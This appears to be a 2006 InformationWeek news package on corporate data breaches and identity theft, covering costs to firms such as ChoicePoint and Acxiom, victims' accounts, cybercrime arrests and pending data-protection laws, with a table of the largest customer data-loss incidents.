|The Losers, by Paul McDougall|
|The Victims, by Elena Malykhina|
|The Goods, by Larry Greenemeier|
|The Crooks, by Aaron Ricadela|
|The Law, by Marianne Kolbasuk McGee|
|Timeline: Mistakes Galore|
|Interactive Presentation: Personal Data Sieves|
In the past few weeks, some of the largest U.S. banks-including Bank of America, Washington Mutual, and Wells Fargo-have had to reissue debit cards, all because of data theft. The banks haven't come clean with all the details about what went wrong. In the case of Citibank, Gartner analyst Avivah Litan contends the gaffe was the result of data being stolen from a company that stores PINs.
Olatunji Oluwatosin was sentenced to 16 months as part of the ChoicePoint investigation.
Photo courtesy of AP
The consequences of vulnerable data management practices are becoming clearer with every new instance of exposed Social Security numbers, purloined PINs, and hacked accounts. Last month, one IT worker at Providence Health System in Portland, Ore., was fired and three others quit following the theft of computer tapes that held sensitive patient information, including addresses, phone numbers, and Social Security numbers. Staffers at the health care concern routinely brought the tapes home to back up the data on systems there. Predictably, the tapes were stolen from a van parked outside one of their residences.
Providence's gaffe shows how the financial and legal aftereffects of a breach spread like a bad rash. A company official told the Portland Oregonian that he expects the case, not including litigation costs, to cost from $7 million to $9 million. That includes providing affected patients with access to credit monitoring and restoration services. There's also the prospect of civil lawsuits by state agencies or individuals whose data was stolen, potentially costing millions more. "I'm looking at this case-monitoring it," says Shannon Smith, senior counsel with the Washington state attorney general's office. Smith has an eye on Providence because the company has operations in Washington. Generally speaking, she says, "it's an unfair business practice for a company to fail to take reasonable measures to secure the personal information of customers or other consumers."
ChoicePoint CEO Derek Smith has had a long year of explaining after his company sold data to scammers.
Photo courtesy of AP
People's Bank in Bridgeport, Conn., offers a harsh lesson for companies that know they have a security risk but haven't yet fixed it. The bank earlier this year was switching from shipping backup tapes by courier to a system that transmits data to credit bureaus electronically using an encrypted format to eliminate the risk of lost or stolen tapes. "When we heard about similar incidents in the industry last year, we identified this as an operational risk and took steps," CTO Srihari Makkala says.
Too late. In January, the company disclosed that UPS lost a tape containing data on 90,000 customers who use its personal credit-line service. The tape contained names, addresses, and Social Security and checking account numbers. The bank maintains the data can't be read without access to sophisticated mainframe hardware and software.
Still, it's ugly PR and expensive. People's Bank is footing the bill for customers who need to sign up for credit monitoring and restoration services, and shelling out for a major consulting firm to perform an end-to-end review of its security procedures. The inspection will go beyond IT systems and include everything from premises security to the way employees handle documents, such as faxes, that bear customer data. Without providing specifics, Makkala says total costs could be substantial. "When something like this happens, we don't want to put a price on reputation, but it's significant," he says. "It's high risk and high cost."
It's unclear if the bank will try to recoup any costs from UPS, since the investigation is ongoing. A UPS spokesman calls the loss "an unfortunate occurrence" and says UPS uses special security measures for sensitive packages, but he declined to detail them or say whether they were used in this instance.
People's Bank has its encryption system running, but it still exchanges physical media with the Internal Revenue Service and others that aren't ready for encrypted files. "We're at the mercy of the institutions on the other end," Makkala says.
Beyond the immediate sting, data breaches can result in a loss of future business. "There's no telling what's gone in the opportunity column," says Frank Caserta, chief security officer at Acxiom, a data management provider that had files containing names and other information on millions of credit card holders stolen.
A spammer in Florida, Scott Levine, last month was sentenced to eight years in prison for his role in the theft, which occurred in 2003. Levine, 46, used his firm's limited authorized access into Acxiom's systems as a gateway into more closely guarded files. "Permissions were set incorrectly and that made the files visible," Caserta says. The judge presiding over Levine's trial determined the theft resulted in actual losses to Acxiom of about $850,000, but the damage goes beyond that. "The cost to your reputation is huge," says Caserta. "If you can't maintain trust in a business like ours, you're out of business."
After the theft became public, prospective customers took more time than usual in deciding whether to do business with Acxiom. "We suffered some delays," Caserta admits. No Acxiom employees lost their jobs because of the incident, which Caserta says was the result of a relatively minor technical glitch. "You can't just go on a witch hunt because you need a body to hold up," he says. However, some people have since been let go in unrelated incidents for violating security policies, either knowingly or through carelessness. "There have been other areas where someone breaks a rule, and by God, the discipline for that is swift and understood," Caserta says.
Acxiom also has paid a price in terms of the increased staff and management hours devoted to quelling customers' concerns about its security. The number of clients asking to audit Acxiom's security systems has increased dramatically. "They do a deep dive on security at every level," Caserta says. The company hired consultants to perform SAS 70 and other audits of its security and related IT processes.
New York Sen. Schumer frets about personal data in public records.
Photo courtesy of UPI
The costs are starting to mount. According to its most recent quarterly report, B.J.'s took $10 million in charges to cover expected claims by banks that issued the cards containing the stolen data. The banks were forced to reimburse card holders for the purchases made in their names. As of October, banks were seeking $13 million in compensation-a number that could increase as more scam purchases are linked back to the original data theft. B.J.'s is looking to recover some of its losses from IBM, claiming that when it upgraded card-processing software, it told IBM to deactivate a feature that retains magnetic strip data so that a transaction can be processed offline. It's that data that was hacked. IBM declined to comment.
B.J.'s settlement with the FTC requires it to hire an external auditor to scrutinize its security systems every two years for the next two decades. That's similar to the penalty levied against CardSystems Solutions, which processes credit card transactions, when thieves broke into its systems and stole data resulting in millions of dollars in fraudulent purchases. The FTC has mandated that CardSystems, which was acquired by Pay By Touch in December, implement an IT security program and submit to an external security audit every other year for the next 20 years.
|Top 10 Customer Data-Loss Incidents|
|Company/Organization||No. of affected||Date of initial customers disclosure|
|CardSystems||40 million||June 17, 2005|
|Citigroup||3.9 million||June 6, 2005|
|DSW Shoe Warehouse||1.4 million||March 8, 2005|
|Bank of America||1.2 million||Feb. 25, 2005|
|Wachovia, Bank of America, PNC Financial Services Group, Commerce Bancorp||676,000||April 28, 2005|
|Time Warner||600,000||May 2, 2005|
|Georgia Department of Motor Vehicles||465,000||April 2005|
|LexisNexis||310,000||March 9, 2005|
|University of Southern California||270,000||July 19, 2005|
|Marriott International||206,000||Dec. 28, 2005|
|Note: As of March 2006
Data: Privacy Rights Clearinghouse, InformationWeek
ChoicePoint paid dearly earlier this year when it agreed to pay $15 million in fines after unwittingly selling more than 100,000 consumer credit reports to thieves posing as legit customers. The FTC said the company didn't have "reasonable procedures" for screening customers.
Government data breaches can be costly, too. The state of Rhode Island was forced to take down its online vehicle registration system in January after hackers stole user information, including credit card numbers. The state is looking to hire a chief security officer to prevent a repeat, but it could be a long search. "It's tough finding someone. The private sector can afford to pay more than we can," says Beverly Najarian, director of the state's department of administration.
Businesses, schools, and government agencies need to get the problem under control. Paranoia over unintended data disclosures is apparent and appropriate-what's needed now is greater urgency in putting a stop to them.
It was an inside job. A lab technician who had tested Drew's blood at the Seattle Cancer Care Alliance gained unauthorized access to the hospital's computer records and used Drew's personal information to open credit card accounts. The technician, Richard Gibson, later turned himself in to the police and pleaded guilty to violating the Health Insurance Portability and Accountability Act. Gibson became the first person charged under HIPAA with misusing a patient's medical information for financial gain.
"It's disturbing that financial institutions issued credit cards without any [due] diligence that the real Eric Drew was in a hospital," Drew says.
Unfortunately, Drew's situation is all too familiar. There have been 8.9 million adult victims of identity fraud in the United States over the past 12 months, according to a report issued earlier this year by Javelin Strategy and Research and the Better Business Bureau. That's down slightly from the 9.3 million victims a year earlier, but not a sign of great progress. The problem "is not lessening significantly," says Beth Givens, director of the Privacy Rights Clearinghouse, a watchdog group that tracks data breaches that could lead to ID theft.
Givens partly blames creditors that are too willing to extend credit to people they don't know well enough and who are sometimes impostors working with false identities. "The credit evaluation process is automated," she says. "They're not looking for obvious red flags."
J. Alex Halderman, a doctoral candidate in computer science at Princeton University, about a year ago received a letter from the University of California, Berkeley, where he had been accepted as a graduate student in 2003, advising him that his personal data had been compromised. A university computer had been stolen that contained files with names and Social Security numbers of applicants and others at the university.
Berkeley warned people affected by the breach to be on the lookout for scam artists who might try to contact them under the pretense of being affiliated with the school. Halderman was shocked that two years after he applied to UC Berkeley, the application remained susceptible to a data breach. "It's amazing that data can be on file for years, even when you think you're finished with it," he says. "There's no way to take it back."
Although there was no evidence that Halderman's personal data was misused, he had a fraud alert placed on his credit file. That service lasted only 90 days, however, and he still worries that his information may fall into the wrong hands.
Warren Lambert gets word that his personal information may have been stolen from ChoicePoint.
Keith Ernst of Durham, N.C., had his debit card number posted to an Arabic-language bulletin board on the Web in 2004, making it easy to reach through simple search engine queries. Several charges were rung up on his card, including a laptop purchase and an attempted tuition payment. "I got a phone call out of the blue saying that someone is using my debit card," Ernst says.
Ernst doesn't know how his debit card number got on the Web; he suspects it had something to do with a purchase he made on the Internet. He canceled the card and the bank restored the money that came out of his checking account, but Ernst learned a lesson. "I now use credit cards instead of debit cards when I shop online. I also pay a lot more attention to the vendors that I'm buying from," he says. "I would never buy from an unknown vendor."
Consumer confidence suffers at the hands of hackers and ID thieves and lax data protection measures. That means businesses ultimately feel the pain of their own negligence.
No one seems to know how often Social Security numbers and other personal information are carelessly posted on the Web, but government agencies from the Department of Justice to village clerks have slipped up. In December, InformationWeek reported that certain pages on the Justice Department's Web site included the names and Social Security numbers of people involved in department-related legal actions.
Justice acknowledged the personal information shouldn't have been publically available, and the documents are now blocked from view. The Social Security numbers, however, still can be accessed using general-purpose search engines. Other tricks for bypassing controls include clicking on cached or HTML links and copying text from Adobe PDF files into Microsoft Word.
Levine turned limited access to Acxiom systems into major theft.
"Having someone's Social Security number is having the key to that person's identity," says Dana Lesemann, VP and deputy general counsel at Stroz Friedberg, a consulting firm specializing in computer forensics. Thieves use a name and Social Security number to get other information and then order credit cards, take out mortgages, and apply for other services using the victim's identity.
There aren't any laws prohibiting the collection and use of Social Security numbers, though people who use them for identity theft can be prosecuted for fraud. Bills were introduced in Congress last year to establish criminal penalties for buying and selling Social Security numbers and are now in committee (see story, "The Law").
When sensitive information is freely available to the public on the Web, it's often the result of carelessness and rarely a technology problem. As with most aspects of security, training in the proper use of technology and data-handling policies is essential, says Lesemann, who has studied the ways PDF files in particular can be exploited to gain access to sensitive information. "Everyone uses PDF files, but no one understands the pitfalls."
Businesses create PDF files using scanned images, digital photos, and text documents. It's possible to restrict the way PDFs are viewed, printed, and edited, and a common way to block PDF content from view is to place a black box over a portion of the image. However, the black box is actually a layer within the PDF, so the sensitive information is still there-and still at risk. A U.S. military report issued last year on the topic of an investigation into the fatal shooting of an Italian agent escorting a freed hostage through a checkpoint in Iraq included several black boxes blocking sensitive information. A PDF of the document was posted on the Web but was pulled when the military realized visitors could remove the black boxes by copying the text into a Word document, Lesemann says.
A better understanding among business and government employees of how to properly scrub documents would go a long way toward resolving the problem.
An industry has formed around the search for sensitive information. Sites, including Identity Crawler, People-Search, Records Registry, and ZabaSearch.com, make public data revealed by errors, lapses in privacy and security policy, and carelessness. These sites, which are used by private investigators and others, collect Social Security numbers and other personally identifiable information in any number of ways, including trolling the Web for unsecured documents.
But the bad guys don't always get away. In January, Bulgarian police arrested eight people in connection with an international phishing operation. Microsoft, which assisted in the investigation, said the group is part of a criminal network that steals personal information and commits fraud online. The group had sent E-mail forged to look as if it came from MSN customer service reps, then used purloined credit card information to buy goods and receive money transfers worth more than $50,000.
Last August, the FBI, along with Turkish and Moroccan police, arrested the authors of the Zotob and Mytob worms, which left infected PCs open to becoming part of zombie networks that could send spam, launch denial-of-service attacks, or swipe personal information. The FBI says the worm authors pilfered credit card numbers used to buy merchandise.
Yet many online data theft cases remain unsolved. In June 2004, organized criminals in Russia figured out a vulnerability in Microsoft's Web server software that let them append a small amount of Java code to objects sent by several hundred E-commerce companies' servers running Microsoft's Internet Information Server. That code installed keystroke-logging software on Internet users' copies of Microsoft's Internet Explorer browser in a way that went undetected by antivirus packages. When those users visited the Web sites of banks such as Citibank and Wachovia, the keystroke-logging software captured their user names and passwords.
Researchers traced the scam to a group called the "hang-up team," but U.S. and Russian law enforcement have yet to make an arrest. "It was a clear turning point" from nuisance attacks to under-the-radar crimes for the sole purpose of capturing personal financial data, says Marcus Sachs, a deputy director in the computer science lab at SRI International and a cybersecurity consultant to the Department of Homeland Security.
Launching investigations quickly by combining consumer complaints with data from the FBI and technology companies is key to making arrests, says Dan Larkin, unit chief of the FBI's cyber division. With cyber- crime, "the trail is pretty fast and fleeting, and the rules of evidence don't really apply on the international scale," Larkin says. The FBI has arrested more than 20 online data thieves since January, he says.
What's taken the place of publicity-seeking malware attacks is software written and distributed by professional criminals, and the resulting damage threatens to disrupt consumer confidence in online commerce.
But not all cyberthieves are pros. Jayson Harris, a 23-year-old Iowa resident, pleaded guilty in January to wire fraud and other charges for collecting data from Internet users by setting up sites that mimicked Microsoft's MSN billing Web site. And earlier this month, James Green, a former security guard on hire to General Motors, was arraigned on eight counts of obtaining, possessing, or transferring personal identity information, according to The Associated Press. He's accused of using his position with a private security firm to steal Social Security numbers of about 100 GM employees and sending them E-mails posing as a representative of GM's program for evaluating company vehicles.
Many phishing scams, in which thieves lure Web surfers to bogus sites where they're tricked into revealing personal financial information, originate in some of the former Soviet republics. Experts believe cases in which credit card numbers have been stolen from companies' servers have their roots there as well. Tim Cranton, a senior attorney and director of Internet safety enforcement programs at Microsoft, says the cybergangs operate like organized criminal networks in which members have different jobs-one may harvest E-mail addresses, while another installs code onto targeted PCs-and they communicate across national borders.
Tech vendors keep fighting back. Microsoft is expected this week to disclose 10 lawsuits against alleged phishers and plans for about 100 actions in the next month, part of a new global phishing enforcement initiative.
More than 20 states have data-protection laws, many of them modeled on the one in California. It's thanks to these state laws that we have our current understanding of how often companies lose data; before them, companies kept most of these mishaps out of public view. California law, for example, requires organizations to notify consumers if a breach or mishap puts data at risk.
Congress hasn't done much, despite speeches by the likes of Sens. Specter and Leahy.
Photo courtesy of Getty Images
Since California passed its law in 2003, 12 more states have passed statutes allowing consumers to restrict access to their credit reports. Some states, including Texas and Vermont, only let people who already have been identity theft victims freeze their credit reports. Twenty-seven states have new security-freeze laws or modifications to strengthen existing laws pending, including Texas.
New Jersey, whose security-freeze laws went into effect in January, probably has the strongest safeguards. It requires credit bureaus to allow quick placement and lifting of freezes at minimal cost for consumers, so they can allow legitimate parties a kind of open-and-shut access to their records. New Jersey also prohibits any private or public entity from publicly posting or displaying a Social Security number or any four consecutive numbers of a Social Security number. The law also prohibits Social Security numbers on mailings, and on Web sites, unless another authentication device or number is required to access the site.
In the past two years, more than a dozen bills have been introduced in the U.S. House and Senate that, if passed, would supersede existing state laws. Some of the federal proposals are stripped-down versions of state laws that would mean fewer breaches qualify for disclosure; under some, a data breach would have to be deemed a serious threat to consumers before the offending company would have to go public with information about the incident. Other proposals exempt certain kinds of companies.
Among the tougher bills is one introduced last summer by Sens. Patrick Leahy, D-Vt., and Arlen Specter, R-Pa., which would require companies to establish policies to protect customer data and rigorously vet third parties that process their data. Rep. Barney Frank, D-Mass., has proposed legislation requiring parties such as retailers to notify consumers of data breaches that involve credit cards. Today, they can tell the credit card companies, which can inform consumers and leave the retailers out of it. Frank wants to let consumers punch back: "Consumers should know where a break occurs and be able to take their business elsewhere, knowing that," a spokesman for Frank says.
With more courts, state agencies, and even town governments moving to the Web, they're exposing Social Security numbers, home addresses, and other identifiable personal information. Sen. Charles Schumer, D-N.Y., proposes legislation that would let some government entities, such as county clerks, omit certain personal information from public records.
Despite all this activity, Congress isn't likely to pass any sweeping laws. Several House and Senate committees, including banking, commerce, and judiciary, are considering various bills, but getting their members to compromise-especially across party lines-will be difficult in the short term. Says one source involved with identity theft issues, "There isn't a lot of agreement."